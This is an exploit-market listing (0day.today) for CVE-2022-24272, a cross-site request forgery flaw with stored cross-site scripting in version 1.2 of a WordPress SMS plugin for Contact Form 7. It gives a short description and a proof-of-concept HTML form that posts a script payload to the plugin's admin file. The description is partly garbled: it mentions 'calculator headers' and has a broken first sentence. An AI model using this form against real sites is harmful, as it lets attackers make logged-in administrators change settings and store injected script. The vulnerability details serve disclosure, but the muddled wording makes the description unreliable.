[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress International SMS For Contact Form 7 Integration 1.2 CSRF Vulnerability

Author
Milad karimi
Risk
[
Security Risk Low
]
0day-ID
0day-ID-37350
Category
web applications
Date add
14-02-2022
CVE
CVE-2022-24272
Platform
php
# Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross-Site Request Forgery (CSRF)

# Author: Milad Karimi 

# Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/

# Version: 1.2

# Tested on: Windows 11

# CVE: CVE-2022-24272


1. Description:

The plugin International Sms For Contact Form 7 Integration for class-sms-log-display.php and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers. 

Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue




2. Proof of Concept:




<form method="post" action="https://example.com/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=">

    <input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">

    <input type="submit" value="Save" name="submit">

</form>

#  0day.today [2024-07-07]  #